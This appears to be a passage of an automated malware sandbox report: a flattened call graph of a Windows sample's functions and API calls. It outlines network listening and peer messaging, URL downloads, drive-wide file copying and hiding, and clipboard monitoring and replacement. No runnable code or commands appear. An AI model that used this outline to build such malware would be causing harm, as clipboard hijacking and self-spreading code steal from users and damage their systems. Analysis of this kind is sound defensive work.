5258->5260 5260->5257 5261 401fd3 GetQueuedCompletionStatus 5261->5257 5261->5262 5453 401470 5263->5453 5265 40d604 5266 40d632 5265->5266 5267 40d615 WaitForSingleObject 5265->5267 5268 401330 8 API calls 5267->5268 5269 40d62f 5268->5269 5269->5266 5468 4021b0 5270->5468 5273 40cf42 5274 40cf25 WaitForSingleObject 5472 401600 5274->5472 5278 40b423 WaitForSingleObject 5277->5278 5279 40b451 5278->5279 5280 40b43b InterlockedDecrement 5278->5280 5281 40b44a 5280->5281 5281->5278 5282 40ab60 16 API calls 5281->5282 5282->5281 5284 401ac9 5283->5284 5285 40194d WSAWaitForMultipleEvents 5283->5285 5286 4019f0 GetTickCount 5285->5286 5287 40196a WSAEnumNetworkEvents 5285->5287 5288 401a43 GetTickCount 5286->5288 5289 401a05 EnterCriticalSection 5286->5289 5287->5286 5303 401983 5287->5303 5292 401ab5 WaitForSingleObject 5288->5292 5293 401a4e EnterCriticalSection 5288->5293 5290 401a16 5289->5290 5291 401a3a LeaveCriticalSection 5289->5291 5297 401a29 LeaveCriticalSection 5290->5297 5536 401820 5290->5536 5291->5292 5292->5284 5292->5285 5295 401aa1 LeaveCriticalSection GetTickCount 5293->5295 5296 401a5f InterlockedExchangeAdd 5293->5296 5294 401992 accept 5294->5286 5294->5303 5295->5292 5554 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5296->5554 5297->5292 5301 401a72 5301->5295 5301->5296 5555 40ab40 shutdown closesocket 5301->5555 5303->5286 5303->5294 5304 4019e9 5303->5304 5516 4022c0 5303->5516 5305 401cf0 7 API calls 5304->5305 5305->5286 5309 40ceb4 5306->5309 5307 40b200 5 API calls 5307->5309 5308 40ced0 WaitForSingleObject 5308->5309 5311 40cef5 5308->5311 5309->5307 5309->5308 5309->5311 5569 40cad0 InterlockedExchangeAdd 5309->5569 5313 409d90 7 API calls 5312->5313 5314 4013bb CreateEventA socket 5313->5314 5315 4013f2 5314->5315 5316 4013fd 5314->5316 5317 401330 8 API calls 5315->5317 5318 401401 bind 5316->5318 5319 401462 5316->5319 5320 4013f8 5317->5320 5321 401444 CreateThread 5318->5321 5322 401434 5318->5322 5319->5249 5320->5316 5321->5319 5343 401100 5321->5343 5323 401330 8 API calls 5322->5323 5324 40143a 5323->5324 5324->5249 5326 40b237 LeaveCriticalSection 5325->5326 5327 40b21f 5325->5327 5326->5249 5328 40bec0 3 API calls 5327->5328 5329 40b22a 5328->5329 5329->5326 5372 40b480 5330->5372 5334 401339 5333->5334 5341 40139b 5333->5341 5335 401341 SetEvent WaitForSingleObject CloseHandle 5334->5335 5334->5341 5336 401369 5335->5336 5342 40138b 5335->5342 5338 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5336->5338 5336->5342 5338->5336 5339 401395 5340 40a1b0 __aligned_recalloc_base 3 API calls 5339->5340 5340->5341 5341->5247 5411 40ab40 shutdown closesocket 5342->5411 5344 401115 ioctlsocket 5343->5344 5345 4011e4 5344->5345 5347 40113a 5344->5347 5346 40a1b0 __aligned_recalloc_base 3 API calls 5345->5346 5349 4011ea 5346->5349 5348 4011cd WaitForSingleObject 5347->5348 5350 409fe0 9 API calls 5347->5350 5351 401168 recvfrom 5347->5351 5352 4011ad InterlockedExchangeAdd 5347->5352 5348->5344 5348->5345 5350->5347 5351->5347 5351->5348 5354 401000 5352->5354 5355 401014 5354->5355 5356 40103b 5355->5356 5358 409d90 7 API calls 5355->5358 5365 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5356->5365 5358->5356 5359 40105b 5366 401580 5359->5366 5361 4010ec 5361->5347 5362 4010a3 IsBadReadPtr 5364 401071 5362->5364 5363 4010d8 memmove 5363->5364 5364->5361 5364->5362 5364->5363 5365->5359 5367 401592 5366->5367 5368 4015a5 memcpy 5366->5368 5369 409fe0 9 API calls 5367->5369 5370 4015c1 5368->5370 5371 40159f 5369->5371 5370->5364 5371->5368 5373 40bf00 3 API calls 5372->5373 5374 40b48b 5373->5374 5375 40b4a7 lstrlenA 5374->5375 5376 40c190 7 API calls 5375->5376 5377 40b4dd 5376->5377 5380 40b508 5377->5380 5383 40cc30 5377->5383 5388 40d520 5377->5388 5378 40b4fc 5379 40a1b0 __aligned_recalloc_base 3 API calls 5378->5379 5379->5380 5380->5249 5391 40cc90 5383->5391 5385 40cc5e 5385->5378 5387 40cc90 send 5387->5385 5395 401200 5388->5395 5390 40d542 5390->5378 5392 40cca1 send 5391->5392 5393 40cc43 5392->5393 5394 40ccbe 5392->5394 5393->5385 5393->5387 5394->5392 5394->5393 5396 401314 5395->5396 5397 40121d 5395->5397 5396->5390 5397->5396 5398 409fa0 __aligned_recalloc_base 7 API calls 5397->5398 5399 401247 memcpy htons 5398->5399 5400 4012ed 5399->5400 5401 401297 sendto 5399->5401 5404 40a1b0 __aligned_recalloc_base 3 API calls 5400->5404 5402 4012b6 InterlockedExchangeAdd 5401->5402 5403 4012e9 5401->5403 5402->5401 5405 4012cc 5402->5405 5403->5400 5406 40130a 5403->5406 5407 4012fc 5404->5407 5408 40a1b0 __aligned_recalloc_base 3 API calls 5405->5408 5409 40a1b0 __aligned_recalloc_base 3 API calls 5406->5409 5407->5390 5410 4012db 5408->5410 5409->5396 5410->5390 5411->5339 5413 401ef2 InterlockedDecrement setsockopt closesocket 5412->5413 5414 401d74 5412->5414 5431 401e39 5413->5431 5414->5413 5415 401d7c 5414->5415 5432 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5415->5432 5417 401d81 InterlockedExchange 5418 401d98 5417->5418 5419 401e4e 5417->5419 5422 401da9 InterlockedDecrement 5418->5422 5423 401dbc InterlockedDecrement InterlockedExchangeAdd 5418->5423 5418->5431 5420 401e67 5419->5420 5421 401e57 InterlockedDecrement 5419->5421 5424 401e72 5420->5424 5425 401e87 InterlockedDecrement 5420->5425 5421->5261 5422->5261 5429 401e2f 5423->5429 5441 401ae0 WSASend 5424->5441 5426 401ee9 5425->5426 5426->5261 5428 401e7e 5428->5261 5433 401cf0 5429->5433 5431->5261 5432->5417 5434 401d00 InterlockedExchangeAdd 5433->5434 5435 401cfc 5433->5435 5436 401d53 5434->5436 5437 401d17 InterlockedIncrement 5434->5437 5435->5431 5436->5431 5447 401c50 WSARecv 5437->5447 5439 401d46 5439->5436 5440 401d4c InterlockedDecrement 5439->5440 5440->5436 5442 401b50 5441->5442 5443 401b12 WSAGetLastError 5441->5443 5442->5428 5443->5442 5444 401b1f 5443->5444 5445 401b56 5444->5445 5446 401b26 Sleep WSASend 5444->5446 5445->5428 5446->5442 5446->5443 5448 401cd2 5447->5448 5449 401c8e 5447->5449 5448->5439 5450 401c90 WSAGetLastError 5449->5450 5451 401ca4 Sleep WSARecv 5449->5451 5452 401cdb 5449->5452 5450->5448 5450->5449 5451->5448 5451->5450 5452->5439 5454 401483 5453->5454 5455 401572 5453->5455 5454->5455 5456 409d90 7 API calls 5454->5456 5455->5265 5457 401498 CreateEventA socket 5456->5457 5458 4014da 5457->5458 5459 4014cf 5457->5459 5458->5455 5461 4014e2 htons setsockopt bind 5458->5461 5460 401330 8 API calls 5459->5460 5462 4014d5 5460->5462 5463 401546 5461->5463 5464 401558 CreateThread 5461->5464 5462->5458 5465 401330 8 API calls 5463->5465 5464->5455 5467 401100 20 API calls __aligned_recalloc_base 5464->5467 5466 40154c 5465->5466 5466->5265 5469 4021bb 5468->5469 5470 4021cf 5468->5470 5469->5470 5493 402020 5469->5493 5470->5273 5470->5274 5473 40160d 5472->5473 5492 401737 5472->5492 5474 401619 EnterCriticalSection 5473->5474 5473->5492 5475 4016b5 LeaveCriticalSection SetEvent 5474->5475 5478 401630 5474->5478 5476 4016d0 5475->5476 5477 4016e8 5475->5477 5479 4016d6 PostQueuedCompletionStatus 5476->5479 5480 40d2d0 11 API calls 5477->5480 5478->5475 5481 401641 InterlockedDecrement 5478->5481 5483 40165a InterlockedExchangeAdd 5478->5483 5490 4016a0 InterlockedDecrement 5478->5490 5479->5477 5479->5479 5482 4016f3 5480->5482 5481->5478 5484 40d410 7 API calls 5482->5484 5483->5478 5485 40166d InterlockedIncrement 5483->5485 5486 4016fc CloseHandle CloseHandle WSACloseEvent 5484->5486 5487 401c50 4 API calls 5485->5487 5515 40ab40 shutdown closesocket 5486->5515 5487->5478 5489 401724 DeleteCriticalSection 5491 40a1b0 __aligned_recalloc_base 3 API calls 5489->5491 5490->5478 5491->5492 5492->5273 5494 409d90 7 API calls 5493->5494 5495 40202b 5494->5495 5496 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5495->5496 5497 4021aa 5495->5497 5498 402076 CreateIoCompletionPort 5496->5498 5499 40219f 5496->5499 5497->5470 5498->5499 5500 40208f 5498->5500 5501 401600 36 API calls 5499->5501 5502 40d130 8 API calls 5500->5502 5503 4021a5 5501->5503 5504 402094 5502->5504 5503->5497 5504->5499 5505 40209f WSASocketA 5504->5505 5505->5499 5506 4020bd setsockopt htons bind 5505->5506 5506->5499 5507 402126 listen 5506->5507 5507->5499 5508 40213a WSACreateEvent 5507->5508 5508->5499 5509 402147 WSAEventSelect 5508->5509 5509->5499 5514 402159 5509->5514 5510 40217f 5511 40d160 328 API calls 5510->5511 5513 402194 5511->5513 5512 40d160 328 API calls 5512->5514 5513->5470 5514->5510 5514->5512 5515->5489 5517 4022d2 EnterCriticalSection 5516->5517 5518 4022cd 5516->5518 5519 4022fd LeaveCriticalSection 5517->5519 5520 4022e7 5517->5520 5518->5303 5521 402308 5519->5521 5522 40230f 5519->5522 5520->5519 5521->5303 5523 409d90 7 API calls 5522->5523 5524 402319 5523->5524 5525 402326 getpeername CreateIoCompletionPort 5524->5525 5526 4023b8 5524->5526 5527 4023b2 5525->5527 5528 402366 5525->5528 5558 40ab40 shutdown closesocket 5526->5558 5531 40a1b0 __aligned_recalloc_base 3 API calls 5527->5531 5556 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5528->5556 5531->5526 5532 4023c3 5532->5303 5533 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5557 4021e0 EnterCriticalSection LeaveCriticalSection 5533->5557 5535 4023ab 5535->5303 5537 401830 5536->5537 5545 40190f 5536->5545 5538 40183d InterlockedExchangeAdd 5537->5538 5537->5545 5539 401854 5538->5539 5538->5545 5540 401880 5539->5540 5539->5545 5559 4017a0 EnterCriticalSection 5539->5559 5544 401891 5540->5544 5568 40ab40 shutdown closesocket 5540->5568 5542 4018a7 InterlockedDecrement 5546 401901 5542->5546 5544->5542 5544->5546 5545->5291 5547 402247 5546->5547 5548 402265 EnterCriticalSection 5546->5548 5547->5291 5549 40229c LeaveCriticalSection DeleteCriticalSection 5548->5549 5552 40227d 5548->5552 5550 40a1b0 __aligned_recalloc_base 3 API calls 5549->5550 5550->5547 5551 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5551->5552 5552->5551 5553 40229b 5552->5553 5553->5549 5554->5301 5555->5301 5556->5533 5557->5535 5558->5532 5560 401807 LeaveCriticalSection 5559->5560 5561 4017ba InterlockedExchangeAdd 5559->5561 5560->5539 5562 4017ca LeaveCriticalSection 5561->5562 5563 4017d9 5561->5563 5562->5539 5564 40a1b0 __aligned_recalloc_base 3 API calls 5563->5564 5565 4017fe 5564->5565 5566 40a1b0 __aligned_recalloc_base 3 API calls 5565->5566 5567 401804 5566->5567 5567->5560 5568->5544 5570 40caed 5569->5570 5581 40cae6 5569->5581 5586 40cdc0 5570->5586 5573 40cb0d InterlockedIncrement 5583 40cb17 5573->5583 5574 40b520 18 API calls 5574->5583 5575 40cb40 5594 40aa20 inet_ntoa 5575->5594 5577 40cb4c 5578 40cc10 InterlockedDecrement 5577->5578 5593 40ab40 shutdown closesocket 5578->5593 5579 40ccf0 6 API calls 5579->5583 5581->5309 5582 409fa0 __aligned_recalloc_base 7 API calls 5582->5583 5583->5574 5583->5575 5583->5578 5583->5579 5583->5582 5585 40a1b0 __aligned_recalloc_base 3 API calls 5583->5585 5595 40b570 5583->5595 5585->5583 5587 40cdcd socket 5586->5587 5588 40cde2 htons connect 5587->5588 5589 40ce3f 5587->5589 5588->5589 5590 40ce2a 5588->5590 5589->5587 5591 40cafd 5589->5591 5609 40ab40 shutdown closesocket 5590->5609 5591->5573 5591->5581 5593->5581 5594->5577 5606 40b581 5595->5606 5598 40a1b0 __aligned_recalloc_base 3 API calls 5599 40b94f 5598->5599 5599->5583 5600 40b960 26 API calls 5600->5606 5601 40ae80 32 API calls 5601->5606 5603 40b59f 5603->5598 5605 40b520 18 API calls 5605->5606 5606->5600 5606->5601 5606->5603 5606->5605 5610 40bab0 5606->5610 5617 40b250 EnterCriticalSection 5606->5617 5622 406e90 5606->5622 5627 406f30 5606->5627 5632 406d60 5606->5632 5639 406e60 5606->5639 5609->5591 5611 40bac1 lstrlenA 5610->5611 5612 40c190 7 API calls 5611->5612 5616 40badf 5612->5616 5613 40baeb 5614 40bb6f 5613->5614 5615 40a1b0 __aligned_recalloc_base 3 API calls 5613->5615 5614->5606 5615->5614 5616->5611 5616->5613 5619 40b268 5617->5619 5618 40b2a4 LeaveCriticalSection 5618->5606 5619->5618 5642 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5619->5642 5621 40b293 5621->5618 5643 406ed0 5622->5643 5625 406ec9 5625->5606 5626 40d160 339 API calls 5626->5625 5628 406ed0 75 API calls 5627->5628 5629 406f4f 5628->5629 5630 406f7c 5629->5630 5658 406f90 5629->5658 5630->5606 5661 405fa0 EnterCriticalSection 5632->5661 5634 406d7a 5635 406dad 5634->5635 5666 406dc0 5634->5666 5635->5606 5638 40a1b0 __aligned_recalloc_base 3 API calls 5638->5635 5673 406060 EnterCriticalSection 5639->5673 5641 406e82 5641->5606 5642->5621 5646 406ee3 5643->5646 5644 406ea4 5644->5625 5644->5626 5646->5644 5647 405eb0 EnterCriticalSection 5646->5647 5648 40c820 71 API calls 5647->5648 5649 405ece 5648->5649 5650 405f8b LeaveCriticalSection 5649->5650 5651 405ee7 5649->5651 5654 405f08 5649->5654 5650->5646 5652 405ef1 memcpy 5651->5652 5653 405f06 5651->5653 5652->5653 5655 40a1b0 __aligned_recalloc_base 3 API calls 5653->5655 5654->5653 5657 405f66 memcpy 5654->5657 5656 405f88 5655->5656 5656->5650 5657->5653 5659 40b480 18 API calls 5658->5659 5660 406fd5 5659->5660 5660->5630 5663 405fbe 5661->5663 5662 40604a LeaveCriticalSection 5662->5634 5663->5662 5664 40a220 8 API calls 5663->5664 5665 40601c 5664->5665 5665->5662 5667 409fa0 __aligned_recalloc_base 7 API calls 5666->5667 5668 406dd2 memcpy 5667->5668 5669 40b480 18 API calls 5668->5669 5670 406e3c 5669->5670 5671 40a1b0 __aligned_recalloc_base 3 API calls 5670->5671 5672 406da1 5671->5672 5672->5638 5698 40c880 5673->5698 5676 4062a3 LeaveCriticalSection 5676->5641 5677 40c820 71 API calls 5678 406099 5677->5678 5678->5676 5679 4060f4 memcpy 5678->5679 5697 4061b8 5678->5697 5681 40a1b0 __aligned_recalloc_base 3 API calls 5679->5681 5680 40a1b0 __aligned_recalloc_base 3 API calls 5683 406202 5680->5683 5684 406118 5681->5684 5682 405cf0 74 API calls 5685 4061e1 5682->5685 5683->5676 5686 406211 CreateFileW 5683->5686 5687 40a220 8 API calls 5684->5687 5685->5680 5686->5676 5688 406234 5686->5688 5689 406128 5687->5689 5692 406251 WriteFile 5688->5692 5693 40628f FlushFileBuffers CloseHandle 5688->5693 5690 40a1b0 __aligned_recalloc_base 3 API calls 5689->5690 5691 40614f 5690->5691 5694 40c190 7 API calls 5691->5694 5692->5688 5693->5676 5695 406185 5694->5695 5696 407310 70 API calls 5695->5696 5696->5697 5697->5682 5697->5685 5701 40bdd0 5698->5701 5702 40bde1 5701->5702 5703 40a220 8 API calls 5702->5703 5704 40bdfb 5702->5704 5705 40bd30 70 API calls 5702->5705 5708 407af0 68 API calls 5702->5708 5709 40be3b memcmp 5702->5709 5703->5702 5706 40a1b0 __aligned_recalloc_base 3 API calls 5704->5706 5705->5702 5707 406082 5706->5707 5707->5676 5707->5677 5708->5702 5709->5702 5709->5704 5715 407490 5710->5715 5711 4074b8 Sleep 5711->5715 5712 40756a Sleep 5712->5715 5713 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5741 40ea30 InternetOpenA 5713->5741 5715->5711 5715->5712 5715->5713 5716 40eae0 61 API calls 5715->5716 5716->5715 5718 405889 memset GetModuleHandleW 5717->5718 5719 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5718->5719 5719->5719 5720 405900 CreateWindowExW 5719->5720 5721 40592b 5720->5721 5722 40592d GetMessageA 5720->5722 5723 40595f ExitThread 5721->5723 5724 405941 TranslateMessage DispatchMessageA 5722->5724 5725 405957 5722->5725 5724->5722 5725->5718 5725->5723 5748 40e770 CreateFileW 5726->5748 5728 406d48 ExitThread 5730 406bf0 5730->5728 5731 406d38 Sleep 5730->5731 5732 406c29 5730->5732 5751 4063a0 GetLogicalDrives 5730->5751 5731->5730 5757 4062c0 5732->5757 5735 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5737 406cd6 wsprintfW 5735->5737 5738 406ceb wsprintfW 5735->5738 5736 406c5b 5737->5738 5763 4066b0 _chkstk 5738->5763 5742 40ea56 InternetOpenUrlA 5741->5742 5743 40eac8 Sleep 5741->5743 5744 40ea75 HttpQueryInfoA 5742->5744 5745 40eabe InternetCloseHandle 5742->5745 5743->5715 5746 40eab4 InternetCloseHandle 5744->5746 5747 40ea9e 5744->5747 5745->5743 5746->5745 5747->5746 5749 40e7b8 5748->5749 5750 40e79f GetFileSize CloseHandle 5748->5750 5749->5730 5750->5749 5756 4063cd 5751->5756 5752 406446 5752->5730 5753 4063dc RegOpenKeyExW 5754 4063fe RegQueryValueExW 5753->5754 5753->5756 5755 40643a RegCloseKey 5754->5755 5754->5756 5755->5756 5756->5752 5756->5753 5756->5755 5758 406319 5757->5758 5759 4062dc 5757->5759 5758->5735 5758->5736 5800 406320 GetDriveTypeW 5759->5800 5762 40630b lstrcpyW 5762->5758 5764 4066c7 5763->5764 5765 4066ce 6 API calls 5763->5765 5764->5736 5766 406782 5765->5766 5767 4067c4 PathFileExistsW 5765->5767 5768 40e770 3 API calls 5766->5768 5769 406874 PathFileExistsW 5767->5769 5770 4067d9 PathFileExistsW 5767->5770 5771 40678e 5768->5771 5774 406885 5769->5774 5775 4068ca FindFirstFileW 5769->5775 5772 406809 PathFileExistsW 5770->5772 5773 4067ea SetFileAttributesW DeleteFileW 5770->5773 5771->5767 5778 4067a5 SetFileAttributesW DeleteFileW 5771->5778 5780 40681a CreateDirectoryW 5772->5780 5781 40683c PathFileExistsW 5772->5781 5773->5772 5776 4068a5 5774->5776 5777 40688d 5774->5777 5775->5764 5779 4068f1 5775->5779 5783 406460 3 API calls 5776->5783 5805 406460 CoInitialize CoCreateInstance 5777->5805 5778->5767 5784 4069b3 lstrcmpW 5779->5784 5791 406b8a FindNextFileW 5779->5791 5793 406a0f lstrcmpiW 5779->5793 5794 406a76 PathMatchSpecW 5779->5794 5795 406af4 PathFileExistsW 5779->5795 5809 406570 CreateDirectoryW wsprintfW FindFirstFileW 5779->5809 5780->5781 5785 40682d SetFileAttributesW 5780->5785 5781->5769 5786 40684d CopyFileW 5781->5786 5787 4068a0 SetFileAttributesW 5783->5787 5784->5779 5788 4069c9 lstrcmpW 5784->5788 5785->5781 5786->5769 5789 406865 SetFileAttributesW 5786->5789 5787->5775 5788->5779 5789->5769 5791->5784 5792 406ba6 FindClose 5791->5792 5792->5764 5793->5779 5794->5779 5796 406a97 wsprintfW SetFileAttributesW DeleteFileW 5794->5796 5795->5779 5797 406b0a wsprintfW wsprintfW 5795->5797 5796->5779 5797->5779 5798 406b74 MoveFileExW 5797->5798 5798->5791 5801 4062ff 5800->5801 5802 406348 5800->5802 5801->5758 5801->5762 5802->5801 5803 40635c QueryDosDeviceW 5802->5803 5803->5801 5804 406376 StrCmpNW 5803->5804 5804->5801 5806 406496 5805->5806 5808 4064d2 5805->5808 5807 4064a0 wsprintfW 5806->5807 5806->5808 5807->5808 5808->5787 5810 4065c5 lstrcmpW 5809->5810 5811 40669f 5809->5811 5812 4065db lstrcmpW 5810->5812 5816 4065f1 5810->5816 5811->5779 5813 4065f3 wsprintfW wsprintfW 5812->5813 5812->5816 5815 406656 MoveFileExW 5813->5815 5813->5816 5814 40666c FindNextFileW 5814->5810 5817 406688 FindClose RemoveDirectoryW 5814->5817 5815->5814 5816->5814 5817->5811 5818 405970 GetWindowLongW 5819 405994 5818->5819 5820 4059b6 5818->5820 5821 4059a1 5819->5821 5822 405a27 IsClipboardFormatAvailable 5819->5822 5827 405a06 5820->5827 5828 4059ee SetWindowLongW 5820->5828 5829 4059b1 5820->5829 5824 4059c4 SetClipboardViewer SetWindowLongW 5821->5824 5825 4059a7 5821->5825 5823 405a43 IsClipboardFormatAvailable 5822->5823 5831 405a3a 5822->5831 5823->5831 5832 405a58 IsClipboardFormatAvailable 5823->5832 5826 405ba4 DefWindowProcA 5824->5826 5825->5829 5833 405b5d RegisterRawInputDevices ChangeClipboardChain 5825->5833 5827->5829 5830 405a0c SendMessageA 5827->5830 5828->5829 5829->5826 5830->5829 5834 405a75 OpenClipboard 5831->5834 5835 405b3f 5831->5835 5832->5831 5833->5826 5834->5835 5837 405a85 GetClipboardData 5834->5837 5835->5829 5836 405b45 SendMessageA 5835->5836 5836->5829 5837->5829 5838 405a9d GlobalLock 5837->5838 5838->5829 5839 405ab5 5838->5839 5840 405ac8 5839->5840 5841 405ae9 5839->5841 5842 405afe 5840->5842 5843 405ace 5840->5843 5844 405690 13 API calls 5841->5844 5860 4057b0 5842->5860 5845 405ad4 GlobalUnlock CloseClipboard 5843->5845 5854 405570 5843->5854 5844->5845 5845->5835 5849 405b27 5845->5849 5868 404970 lstrlenW 5849->5868 5852 40a1b0 __aligned_recalloc_base 3 API calls 5853 405b3c 5852->5853 5853->5835 5855 40557b 5854->5855 5856 405581 lstrlenW 5855->5856 5857 405594 5855->5857 5858 409fa0 __aligned_recalloc_base 7 API calls 5855->5858 5859 4055b1 lstrcpynW 5855->5859 5856->5855 5856->5857 5857->5845 5858->5855 5859->5855 5859->5857 5865 4057bd 5860->5865 5861 4057c3 lstrlenA 5861->5865 5866 4057d6 5861->5866 5862 405630 2 API calls 5862->5865 5863 409fa0 __aligned_recalloc_base 7 API calls 5863->5865 5865->5861 5865->5862 5865->5863 5865->5866 5867 40a1b0 __aligned_recalloc_base 3 API calls 5865->5867 5902 405760 5865->5902 5866->5845 5867->5865 5874 4049a4 5868->5874 5869 404bee 5869->5852 5870 404dbb StrStrW 5872 404dd2 StrStrW 5870->5872 5873 404dce 5870->5873 5871 404c00 5871->5869 5871->5870 5875 404de5 5872->5875 5876 404de9 StrStrW 5872->5876 5873->5872 5874->5869 5874->5871 5879 404d30 StrStrW 5874->5879 5875->5876 5877 404dfc 5876->5877 5883 404e12 5877->5883 5907 4048a0 lstrlenW 5877->5907 5879->5871 5880 404d58 StrStrW 5879->5880 5880->5871 5881 404d80 StrStrW 5880->5881 5881->5871 5882 40539b StrStrW 5884 4053b7 StrStrW 5882->5884 5887 4053ae StrStrW 5882->5887 5883->5869 5883->5882 5883->5887 5886 4053d3 StrStrW 5884->5886 5884->5887 5886->5887 5888 405470 StrStrW 5887->5888 5889 405469 5887->5889 5890 405483 5888->5890 5891 40548a StrStrW 5888->5891 5889->5888 5890->5891 5892 4054a4 StrStrW 5891->5892 5893 40549d 5891->5893 5894 4054b7 5892->5894 5895 4054be StrStrW 5892->5895 5893->5892 5894->5895 5896 4054d1 5895->5896 5897 4054d8 lstrlenA 5895->5897 5896->5897 5897->5869 5898 4054eb GlobalAlloc 5897->5898 5898->5869 5899 405506 GlobalLock 5898->5899 5899->5869 5900 405519 memcpy GlobalUnlock OpenClipboard 5899->5900 5900->5869 5901 405546 EmptyClipboard SetClipboardData CloseClipboard 5900->5901 5901->5869 5905 40576b 5902->5905 5903 405771 lstrlenA 5903->5905 5904 405630 2 API calls 5904->5905 5905->5903 5905->5904 5906 4057a4 5905->5906 5906->5865 5910 4048c4 5907->5910 5908 40490d 5908->5883 5909 404911 iswalpha 5909->5910 5911 40492c iswdigit 5909->5911 5910->5908 5910->5909 5910->5911 5911->5910 5939 40d4d0 5940 40b570 339 API calls 5939->5940 5941 40d508 5940->5941 5942 40d0d0 5947 401b60 5942->5947 5944 40d0e5 5945 40d104 5944->5945 5946 401b60 16 API calls 5944->5946 5946->5945 5948 401c42 5947->5948 5949 401b70 5947->5949 5948->5944 5949->5948 5950 409d90 7 API calls 5949->5950 5951 401b9d 5950->5951 5951->5948 5952 40a220 8 API calls 5951->5952 5953 401bc9 5952->5953 5954 401be6 5953->5954 5955 401bd6 5953->5955 5956 401ae0 4 API calls 5954->5956 5957 40a1b0 __aligned_recalloc_base 3 API calls 5955->5957 5958 401bf3 5956->5958 5959 401bdc 5957->5959 5960 401c33 5958->5960 5961 401bfc EnterCriticalSection 5958->5961 5959->5944 5964 40a1b0 __aligned_recalloc_base 3 API calls 5960->5964 5962 401c13 5961->5962 5963 401c1f LeaveCriticalSection 5961->5963 5962->5963 5963->5944 5965 401c3c 5964->5965 5966 40a1b0 __aligned_recalloc_base 3 API calls 5965->5966 5966->5948 5967 40ca90 5972 40ad40 5967->5972 5970 40caba 5971 40cad0 339 API calls 5971->5970 5973 40add0 2 API calls 5972->5973 5974 40ad4f 5973->5974 5975 40ad59 5974->5975 5976 40ad5d EnterCriticalSection 5974->5976 5975->5970 5975->5971 5977 40ad7c LeaveCriticalSection 5976->5977 5977->5975 5979 40cf50 5980 40cf66 5979->5980 5994 40cfbe 5979->5994 5981 40cf70 5980->5981 5982 40cfc3 5980->5982 5983 40d013 5980->5983 5980->5994 5986 409d90 7 API calls 5981->5986 5984 40cfe8 5982->5984 5985 40cfdb InterlockedDecrement 5982->5985 6006 40bbc0 5983->6006 5988 40a1b0 __aligned_recalloc_base 3 API calls 5984->5988 5985->5984 5989 40cf7d 5986->5989 5990 40cff4 5988->5990 6002 4023d0 5989->6002 5992 40a1b0 __aligned_recalloc_base 3 API calls 5990->5992 5992->5994 5995 40ad40 4 API calls 5996 40cf9f 5995->5996 5996->5994 5997 40cfab InterlockedIncrement 5996->5997 5997->5994 5998 40d071 IsBadReadPtr 6000 40d039 5998->6000 6000->5994 6000->5998 6001 40b570 339 API calls 6000->6001 6011 40bcc0 6000->6011 6001->6000 6003 402413 6002->6003 6004 4023d9 6002->6004 6003->5995 6004->6003 6005 4023ea InterlockedIncrement 6004->6005 6005->6003 6007 40bbd3 6006->6007 6008 40bbfd memcpy 6006->6008 6009 409fe0 9 API calls 6007->6009 6008->6000 6010 40bbf4 6009->6010 6010->6008 6012 40bce9 6011->6012 6013 40bcde 6011->6013 6012->6013 6014 40bd01 memmove 6012->6014 6013->6000 6014->6013 6054 40ee74 6055 40ee7c 6054->6055 6056 40ef30 6055->6056 6060 40f0b1 6055->6060 6059 40eeb5 6059->6056 6064 40ef9c RtlUnwind 6059->6064 6062 40f0c6 6060->6062 6063 40f0e2 6060->6063 6061 40f151 NtQueryVirtualMemory 6061->6063 6062->6061 6062->6063 6063->6059 6065 40efb4 6064->6065 6065->6059 6015 406c16 6019 406bf8 6015->6019 6016 406d38 Sleep 6016->6019 6017 406c29 6018 4062c0 4 API calls 6017->6018 6020 406c3a 6018->6020 6019->6016 6019->6017 6021 406d48 ExitThread 6019->6021 6023 4063a0 4 API calls 6019->6023 6022 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6020->6022 6024 406c5b 6020->6024 6025 406cd6 wsprintfW 6022->6025 6026 406ceb wsprintfW 6022->6026 6023->6019 6025->6026 6027 4066b0 52 API calls 6026->6027 6027->6024 6066 406a39 6068 4069df 6066->6068 6067 406a0f lstrcmpiW 6067->6068 6068->6067 6069 406b8a FindNextFileW 6068->6069 6072 406a76 PathMatchSpecW 6068->6072 6073 406af4 PathFileExistsW 6068->6073 6079 406570 11 API calls 6068->6079 6070 4069b3 lstrcmpW 6069->6070 6071 406ba6 FindClose 6069->6071 6070->6068 6074 4069c9 lstrcmpW 6070->6074 6076 406bb3 6071->6076 6072->6068 6075 406a97 wsprintfW SetFileAttributesW DeleteFileW 6072->6075 6073->6068 6077 406b0a wsprintfW wsprintfW 6073->6077 6074->6068 6075->6068 6077->6068 6078 406b74 MoveFileExW 6077->6078 6078->6069 6079->6068 6080 40757a ExitThread 6081 40ee7c 6082 40ee9a 6081->6082 6085 40ef30 6081->6085 6083 40f0b1 NtQueryVirtualMemory 6082->6083 6084 40eeb5 6083->6084 6084->6085 6086 40ef9c RtlUnwind 6084->6086 6086->6084 6087 405f7d 6088 405f11 6087->6088 6089 405f7b 6088->6089 6093 405f66 memcpy 6088->6093 6090 40a1b0 __aligned_recalloc_base 3 API calls 6089->6090 6091 405f88 LeaveCriticalSection 6090->6091 6093->6089

                                                                                                                    Executed Functions

                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
